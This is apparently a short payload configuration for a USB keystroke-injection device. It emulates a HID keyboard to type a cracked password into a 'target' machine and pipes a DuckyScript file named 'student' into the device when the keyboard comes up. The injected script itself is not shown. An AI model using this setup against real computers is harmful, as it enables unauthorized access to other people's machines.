USB_VID="0x1d6b"    # Vendor ID
USB_PID="0x1004"    # Product ID
USE_HID=true        # HID keyboard to allow entering cracked password
USE_UMS=false # enable USB Mass Storage

lang="us" # MAKE THE KEYBOARD LANGUAGE MATCH THE TARGET
function onKeyboardUp()
{
	cat $wdir/DuckyScripts/student | duckhid
	led_blink 3
}


